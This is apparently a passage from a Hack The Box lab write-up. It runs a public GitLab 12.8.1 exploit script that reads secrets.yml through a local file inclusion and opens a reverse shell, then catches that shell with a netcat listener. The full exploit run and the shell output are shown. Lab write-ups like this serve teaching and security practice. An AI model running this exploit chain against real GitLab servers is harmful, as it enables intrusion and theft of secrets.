3 :443 gitlab shell

Using https://github.com/dotPY-hax/gitlab_RCE

$ python3 gitlab_rce.py https://git.laboratory.htb 10.10.14.2
Gitlab Exploit by dotPY [insert fancy ascii art]
registering Y3cl0oyCmP:Jl7OajR1He - 200
Getting version of https://git.laboratory.htb - 200
The Version seems to be 12.8.1! Choose wisely
delete user Y3cl0oyCmP - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 2
Start a listener on port 6969 and hit enter (nc -vlnp 6969)
registering cL9zIopTn1:CL3sHaubY2 - 200
creating project MNspDHxG5E - 200
creating project ZZhMIZtX6P - 200
creating issue YSiGfAv3O4 for project MNspDHxG5E - 200
moving issue from MNspDHxG5E to ZZhMIZtX6P - 200
Grabbing file secrets.yml
deploying payload - 500
delete user cL9zIopTn1 - 200


$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.216] 35096
whoami;id;uname -a
git
uid=998(git) gid=998(git) groups=998(git)
Linux git.laboratory.htb 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

<shell is unstable, cannot cd dir and do anything>

Last updated